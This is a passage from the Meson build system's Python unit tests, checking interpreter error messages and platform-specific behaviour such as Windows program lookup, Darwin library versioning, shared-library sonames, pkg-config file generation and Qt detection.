self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
list of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# Assert the full set so that any change to the list of ignored libs forces
# this test to be updated, and so the whole list is exercised below.
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
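# evarMap maps '<lang>_ld' to the environment variable (e.g. 'c_ld' -> CC_LD)
# that selects the linker for that language.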
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = env.detect_d_compiler(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
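# `otool -L` prints '<install name> (compatibility version X, current version Y)';
# the second line (index 1) is the library's own install name.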
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order to ascertain
# that Meson does not call install_name_tool with duplicate -delete_rpath
# arguments, which would cause the installation to fail.
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
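# Point pkg-config at the directory where the generated .pc files were written.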
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
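# `pkg-config --validate` checks that the generated .pc file parses without errors.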
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/47 pkgconfig-gen/meson.build for a description of the case this test covers.
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lz -lsimple1', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
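# Check both the symlink aliases created on disk and the soname recorded in
# each library, for every version/soversion combination.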
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
